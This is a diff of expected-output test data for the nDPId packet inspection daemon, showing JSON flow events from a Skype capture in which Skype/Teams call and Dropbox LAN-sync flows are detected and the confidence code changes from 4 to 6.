+00670{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":592,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":53,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970648822,"flow_last_seen":1431970648822,"flow_idle_time":200000,"flow_min_l4_payload_len":29,"flow_max_l4_payload_len":29,"flow_tot_l4_payload_len":29,"flow_avg_l4_payload_len":29,"midstream":0,"thread_ts_msec":1431970648822,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.13","src_port":13021,"dst_port":40009,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":593,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":54,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970648822,"flow_last_seen":1431970648822,"flow_idle_time":200000,"flow_min_l4_payload_len":26,"flow_max_l4_payload_len":26,"flow_tot_l4_payload_len":26,"flow_avg_l4_payload_len":26,"midstream":0,"thread_ts_msec":1431970648822,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.52.19","src_port":13021,"dst_port":40020,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":593,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":54,"flow_packet_id":1,"flow_last_seen":1431970648822,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":68,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":68,"pkt_l4_len":34,"thread_ts_msec":1431970648822,"pkt":"0NQSxnP1PBXCt3IOCABFAAA29EUAAEAR81vAqAEinTg0EzLdnFQAIrQSet8CIfzcSNY9VVu6zPT0+wzX1iqsIu28Tro="} -00670{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":593,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":54,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970648822,"flow_last_seen":1431970648822,"flow_idle_time":200000,"flow_min_l4_payload_len":26,"flow_max_l4_payload_len":26,"flow_tot_l4_payload_len":26,"flow_avg_l4_payload_len":26,"midstream":0,"thread_ts_msec":1431970648822,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.52.19","src_port":13021,"dst_port":40020,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00670{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":593,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":54,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970648822,"flow_last_seen":1431970648822,"flow_idle_time":200000,"flow_min_l4_payload_len":26,"flow_max_l4_payload_len":26,"flow_tot_l4_payload_len":26,"flow_avg_l4_payload_len":26,"midstream":0,"thread_ts_msec":1431970648822,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.52.19","src_port":13021,"dst_port":40020,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 00598{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":594,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":55,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970648880,"flow_last_seen":1431970648880,"flow_idle_time":200000,"flow_min_l4_payload_len":502,"flow_max_l4_payload_len":502,"flow_tot_l4_payload_len":502,"flow_avg_l4_payload_len":502,"midstream":0,"thread_ts_msec":1431970648880,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"255.255.255.255","src_port":17500,"dst_port":17500,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 01132{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":594,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":55,"flow_packet_id":1,"flow_last_seen":1431970648880,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":544,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":544,"pkt_l4_len":510,"thread_ts_msec":1431970648880,"pkt":"\/\/\/\/\/\/\/\/PBXCt3IOCABFAAISCYEAAEARrZDAqAEi\/\/\/\/\/0RcRFwB\/vqceyJob3N0X2ludCI6IDE1NzMxOTU0NDUsICJ2ZXJzaW9uIjogWzEsIDhdLCAiZGlzcGxheW5hbWUiOiAiIiwgInBvcnQiOiAxNzUwMCwgIm5hbWVzcGFjZXMiOiBbMTQ4MTkzMzcsIDE3NjA5OTYzLCAyMDY0OTM0OSwgMjg1MjE2MDcsIDU4MzQ0OTk2LCA2MDU5NDk4MywgNjQ0MzYwOTksIDk2ODUzMjI0LCA5OTQ2OTc3MywgMTAxMDQ3OTk2LCAxMDgxNTkxMDIsIDEyNTU0MDU2NiwgMTc2OTY0MzA3LCAyNDM2ODI5ODYsIDI0NzkyNTA4NSwgMjYwNDY1MjYxLCAyNzA0MDQ3NDIsIDI4Mzg2MTQ1NywgNDI0NTQwMTk3LCA0NDgzOTczOTMsIDQ1MTQ3MjY1OCwgNTExNzA2NjQyLCA1NjgzOTU4MzMsIDU5NDI0Njk1NCwgNTk4MDYxMDY2LCA2MTU5ODMzNzksIDcyMDA1ODM2MSwgNzM1MDUxODMwLCA3MzYzNDE1MjgsIDc0MTI1NTYxMywgNzc2MDg3MjQ3LCA3ODA4NzA1ODEsIDc4Mjk4MTk0OSwgNzg1MjY2MTc3LCA4MTg3NTI3MTAsIDg1NTY4MjM5MCwgODg0MTIwMTMyLCA5MDg5MTQ4NjhdfQ=="} -00658{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":594,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":55,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970648880,"flow_last_seen":1431970648880,"flow_idle_time":200000,"flow_min_l4_payload_len":502,"flow_max_l4_payload_len":502,"flow_tot_l4_payload_len":502,"flow_avg_l4_payload_len":502,"midstream":0,"thread_ts_msec":1431970648880,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"255.255.255.255","src_port":17500,"dst_port":17500,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Dropbox","breed":"Acceptable","category":"Cloud"}} +00658{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":594,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":55,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970648880,"flow_last_seen":1431970648880,"flow_idle_time":200000,"flow_min_l4_payload_len":502,"flow_max_l4_payload_len":502,"flow_tot_l4_payload_len":502,"flow_avg_l4_payload_len":502,"midstream":0,"thread_ts_msec":1431970648880,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"255.255.255.255","src_port":17500,"dst_port":17500,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Dropbox","breed":"Acceptable","category":"Cloud"}} 00596{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":595,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":56,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970648880,"flow_last_seen":1431970648880,"flow_idle_time":200000,"flow_min_l4_payload_len":502,"flow_max_l4_payload_len":502,"flow_tot_l4_payload_len":502,"flow_avg_l4_payload_len":502,"midstream":0,"thread_ts_msec":1431970648880,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.255","src_port":17500,"dst_port":17500,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 01128{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":595,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":56,"flow_packet_id":1,"flow_last_seen":1431970648880,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":544,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":544,"pkt_l4_len":510,"thread_ts_msec":1431970648880,"pkt":"\/\/\/\/\/\/\/\/PBXCt3IOCABFAAIStlkAAEARPhDAqAEiwKgB\/0RcRFwB\/jf1eyJob3N0X2ludCI6IDE1NzMxOTU0NDUsICJ2ZXJzaW9uIjogWzEsIDhdLCAiZGlzcGxheW5hbWUiOiAiIiwgInBvcnQiOiAxNzUwMCwgIm5hbWVzcGFjZXMiOiBbMTQ4MTkzMzcsIDE3NjA5OTYzLCAyMDY0OTM0OSwgMjg1MjE2MDcsIDU4MzQ0OTk2LCA2MDU5NDk4MywgNjQ0MzYwOTksIDk2ODUzMjI0LCA5OTQ2OTc3MywgMTAxMDQ3OTk2LCAxMDgxNTkxMDIsIDEyNTU0MDU2NiwgMTc2OTY0MzA3LCAyNDM2ODI5ODYsIDI0NzkyNTA4NSwgMjYwNDY1MjYxLCAyNzA0MDQ3NDIsIDI4Mzg2MTQ1NywgNDI0NTQwMTk3LCA0NDgzOTczOTMsIDQ1MTQ3MjY1OCwgNTExNzA2NjQyLCA1NjgzOTU4MzMsIDU5NDI0Njk1NCwgNTk4MDYxMDY2LCA2MTU5ODMzNzksIDcyMDA1ODM2MSwgNzM1MDUxODMwLCA3MzYzNDE1MjgsIDc0MTI1NTYxMywgNzc2MDg3MjQ3LCA3ODA4NzA1ODEsIDc4Mjk4MTk0OSwgNzg1MjY2MTc3LCA4MTg3NTI3MTAsIDg1NTY4MjM5MCwgODg0MTIwMTMyLCA5MDg5MTQ4NjhdfQ=="} -00656{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":595,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":56,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970648880,"flow_last_seen":1431970648880,"flow_idle_time":200000,"flow_min_l4_payload_len":502,"flow_max_l4_payload_len":502,"flow_tot_l4_payload_len":502,"flow_avg_l4_payload_len":502,"midstream":0,"thread_ts_msec":1431970648880,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.255","src_port":17500,"dst_port":17500,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Dropbox","breed":"Acceptable","category":"Cloud"}} +00656{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":595,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":56,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970648880,"flow_last_seen":1431970648880,"flow_idle_time":200000,"flow_min_l4_payload_len":502,"flow_max_l4_payload_len":502,"flow_tot_l4_payload_len":502,"flow_avg_l4_payload_len":502,"midstream":0,"thread_ts_msec":1431970648880,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.255","src_port":17500,"dst_port":17500,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Dropbox","breed":"Acceptable","category":"Cloud"}} 00598{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":596,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":57,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970648979,"flow_last_seen":1431970648979,"flow_idle_time":200000,"flow_min_l4_payload_len":502,"flow_max_l4_payload_len":502,"flow_tot_l4_payload_len":502,"flow_avg_l4_payload_len":502,"midstream":0,"thread_ts_msec":1431970648979,"l3_proto":"ip4","src_ip":"192.168.1.92","dst_ip":"255.255.255.255","src_port":17500,"dst_port":17500,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 01132{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":596,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":57,"flow_packet_id":1,"flow_last_seen":1431970648979,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":544,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":544,"pkt_l4_len":510,"thread_ts_msec":1431970648979,"pkt":"\/\/\/\/\/\/\/\/xCwDBkn+CABFAAIS99EAAEARvwXAqAFc\/\/\/\/\/0RcRFwB\/v9VeyJob3N0X2ludCI6IDMzNzUzNTk1OTMsICJ2ZXJzaW9uIjogWzEsIDhdLCAiZGlzcGxheW5hbWUiOiAiIiwgInBvcnQiOiAxNzUwMCwgIm5hbWVzcGFjZXMiOiBbMTQ4MTkzMzcsIDE3NjA5OTYzLCAyMDY0OTM0OSwgMjg1MjE2MDcsIDU4MzQ0OTk2LCA2MDU5NDk4MywgNjQ0MzYwOTksIDk2ODUzMjI0LCA5OTQ2OTc3MywgMTAxMDQ3OTk2LCAxMDgxNTkxMDIsIDEyNTU0MDU2NiwgMTc2OTY0MzA3LCAyNDM2ODI5ODYsIDI0NzkyNTA4NSwgMjYwNDY1MjYxLCAyNzA0MDQ3NDIsIDI4Mzg2MTQ1NywgNDI0NTQwMTk3LCA0NDgzOTczOTMsIDQ1MTQ3MjY1OCwgNTExNzA2NjQyLCA1NjgzOTU4MzMsIDU5NDI0Njk1NCwgNTk4MDYxMDY2LCA2MTU5ODMzNzksIDcyMDA1ODM2MSwgNzM1MDUxODMwLCA3MzYzNDE1MjgsIDc0MTI1NTYxMywgNzc2MDg3MjQ3LCA3ODA4NzA1ODEsIDc4Mjk4MTk0OSwgNzg1MjY2MTc3LCA4MTg3NTI3MTAsIDg1NTY4MjM5MCwgODg0MTIwMTMyLCA5MDg5MTQ4NjhdfQ=="} -00658{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":596,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":57,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970648979,"flow_last_seen":1431970648979,"flow_idle_time":200000,"flow_min_l4_payload_len":502,"flow_max_l4_payload_len":502,"flow_tot_l4_payload_len":502,"flow_avg_l4_payload_len":502,"midstream":0,"thread_ts_msec":1431970648979,"l3_proto":"ip4","src_ip":"192.168.1.92","dst_ip":"255.255.255.255","src_port":17500,"dst_port":17500,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Dropbox","breed":"Acceptable","category":"Cloud"}} +00658{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":596,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":57,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970648979,"flow_last_seen":1431970648979,"flow_idle_time":200000,"flow_min_l4_payload_len":502,"flow_max_l4_payload_len":502,"flow_tot_l4_payload_len":502,"flow_avg_l4_payload_len":502,"midstream":0,"thread_ts_msec":1431970648979,"l3_proto":"ip4","src_ip":"192.168.1.92","dst_ip":"255.255.255.255","src_port":17500,"dst_port":17500,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Dropbox","breed":"Acceptable","category":"Cloud"}} 00596{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":597,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":58,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970648982,"flow_last_seen":1431970648982,"flow_idle_time":200000,"flow_min_l4_payload_len":502,"flow_max_l4_payload_len":502,"flow_tot_l4_payload_len":502,"flow_avg_l4_payload_len":502,"midstream":0,"thread_ts_msec":1431970648982,"l3_proto":"ip4","src_ip":"192.168.1.92","dst_ip":"192.168.1.255","src_port":17500,"dst_port":17500,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 01128{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":597,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":58,"flow_packet_id":1,"flow_last_seen":1431970648982,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":544,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":544,"pkt_l4_len":510,"thread_ts_msec":1431970648982,"pkt":"\/\/\/\/\/\/\/\/xCwDBkn+CABFAAISMXYAAEARwrnAqAFcwKgB\/0RcRFwB\/jyueyJob3N0X2ludCI6IDMzNzUzNTk1OTMsICJ2ZXJzaW9uIjogWzEsIDhdLCAiZGlzcGxheW5hbWUiOiAiIiwgInBvcnQiOiAxNzUwMCwgIm5hbWVzcGFjZXMiOiBbMTQ4MTkzMzcsIDE3NjA5OTYzLCAyMDY0OTM0OSwgMjg1MjE2MDcsIDU4MzQ0OTk2LCA2MDU5NDk4MywgNjQ0MzYwOTksIDk2ODUzMjI0LCA5OTQ2OTc3MywgMTAxMDQ3OTk2LCAxMDgxNTkxMDIsIDEyNTU0MDU2NiwgMTc2OTY0MzA3LCAyNDM2ODI5ODYsIDI0NzkyNTA4NSwgMjYwNDY1MjYxLCAyNzA0MDQ3NDIsIDI4Mzg2MTQ1NywgNDI0NTQwMTk3LCA0NDgzOTczOTMsIDQ1MTQ3MjY1OCwgNTExNzA2NjQyLCA1NjgzOTU4MzMsIDU5NDI0Njk1NCwgNTk4MDYxMDY2LCA2MTU5ODMzNzksIDcyMDA1ODM2MSwgNzM1MDUxODMwLCA3MzYzNDE1MjgsIDc0MTI1NTYxMywgNzc2MDg3MjQ3LCA3ODA4NzA1ODEsIDc4Mjk4MTk0OSwgNzg1MjY2MTc3LCA4MTg3NTI3MTAsIDg1NTY4MjM5MCwgODg0MTIwMTMyLCA5MDg5MTQ4NjhdfQ=="} -00656{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":597,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":58,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970648982,"flow_last_seen":1431970648982,"flow_idle_time":200000,"flow_min_l4_payload_len":502,"flow_max_l4_payload_len":502,"flow_tot_l4_payload_len":502,"flow_avg_l4_payload_len":502,"midstream":0,"thread_ts_msec":1431970648982,"l3_proto":"ip4","src_ip":"192.168.1.92","dst_ip":"192.168.1.255","src_port":17500,"dst_port":17500,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Dropbox","breed":"Acceptable","category":"Cloud"}} +00656{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":597,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":58,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970648982,"flow_last_seen":1431970648982,"flow_idle_time":200000,"flow_min_l4_payload_len":502,"flow_max_l4_payload_len":502,"flow_tot_l4_payload_len":502,"flow_avg_l4_payload_len":502,"midstream":0,"thread_ts_msec":1431970648982,"l3_proto":"ip4","src_ip":"192.168.1.92","dst_ip":"192.168.1.255","src_port":17500,"dst_port":17500,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Dropbox","breed":"Acceptable","category":"Cloud"}} 00590{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":601,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":59,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970649777,"flow_last_seen":1431970649777,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431970649777,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.147","src_port":51234,"dst_port":40001,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00495{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":601,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":59,"flow_packet_id":1,"flow_last_seen":1431970649777,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431970649777,"pkt":"0NQSxnP1PBXCt3IOCABFAABADS1AAEAG4vXAqAEinTfrk8ginEEPp71\/AAAAALAC\/\/+7IQAAAgQFtAEDAwUBAQgKPjHBiQAAAAAEAgAA"} 00588{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":602,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":60,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970649777,"flow_last_seen":1431970649777,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431970649777,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.45","src_port":51235,"dst_port":40009,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} @@ -234,19 +234,19 @@ 00494{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":603,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":61,"flow_packet_id":1,"flow_last_seen":1431970649777,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431970649777,"pkt":"0NQSxnP1PBXCt3IOCABFAABATBhAAEAGcsvAqAEib91KLcgknEjYMAm6AAAAALAC\/\/91FQAAAgQFtAEDAwUBAQgKPjHBiQAAAAAEAgAA"} 00593{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":604,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":62,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970649777,"flow_last_seen":1431970649777,"flow_idle_time":200000,"flow_min_l4_payload_len":29,"flow_max_l4_payload_len":29,"flow_tot_l4_payload_len":29,"flow_avg_l4_payload_len":29,"midstream":0,"thread_ts_msec":1431970649777,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.171","src_port":13021,"dst_port":40012,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":604,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":62,"flow_packet_id":1,"flow_last_seen":1431970649777,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":71,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":71,"pkt_l4_len":37,"thread_ts_msec":1431970649777,"pkt":"0NQSxnP1PBXCt3IOCABFAAA5i9YAAEARDTHAqAEinTeCqzLdnEwAJdiNeuEC3c6rdtKsOez6ZXpeJVa7dJ779QK3\/h1JCUU="} -00672{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":604,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":62,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970649777,"flow_last_seen":1431970649777,"flow_idle_time":200000,"flow_min_l4_payload_len":29,"flow_max_l4_payload_len":29,"flow_tot_l4_payload_len":29,"flow_avg_l4_payload_len":29,"midstream":0,"thread_ts_msec":1431970649777,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.171","src_port":13021,"dst_port":40012,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00672{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":604,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":62,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970649777,"flow_last_seen":1431970649777,"flow_idle_time":200000,"flow_min_l4_payload_len":29,"flow_max_l4_payload_len":29,"flow_tot_l4_payload_len":29,"flow_avg_l4_payload_len":29,"midstream":0,"thread_ts_msec":1431970649777,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.171","src_port":13021,"dst_port":40012,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":605,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":63,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970649777,"flow_last_seen":1431970649777,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":1431970649777,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.65","src_port":13021,"dst_port":33033,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":605,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":63,"flow_packet_id":1,"flow_last_seen":1431970649777,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":70,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":70,"pkt_l4_len":36,"thread_ts_msec":1431970649777,"pkt":"0NQSxnP1PBXCt3IOCABFAAA4dm4AAEARIgTAqAEiQTffQTLdgQkAJKmFeuMCyKqN77xeuXZwH4mCRZ2EnuTirQv1Yiuj0A=="} -00670{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":605,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":63,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970649777,"flow_last_seen":1431970649777,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":1431970649777,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.65","src_port":13021,"dst_port":33033,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00670{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":605,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":63,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970649777,"flow_last_seen":1431970649777,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":1431970649777,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.65","src_port":13021,"dst_port":33033,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 00594{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":606,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":64,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970649777,"flow_last_seen":1431970649777,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":1431970649777,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"213.199.179.140","src_port":13021,"dst_port":40003,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":606,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":64,"flow_packet_id":1,"flow_last_seen":1431970649777,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":70,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":70,"pkt_l4_len":36,"thread_ts_msec":1431970649777,"pkt":"0NQSxnP1PBXCt3IOCABFAAA4qTUAAEARhmHAqAEi1cezjDLdnEMAJE+IeuUC57gN1FWjl+cH4OXx7LBzSKM5WN7Ui1CRpw=="} -00673{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":606,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":64,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970649777,"flow_last_seen":1431970649777,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":1431970649777,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"213.199.179.140","src_port":13021,"dst_port":40003,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00673{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":606,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":64,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970649777,"flow_last_seen":1431970649777,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":1431970649777,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"213.199.179.140","src_port":13021,"dst_port":40003,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 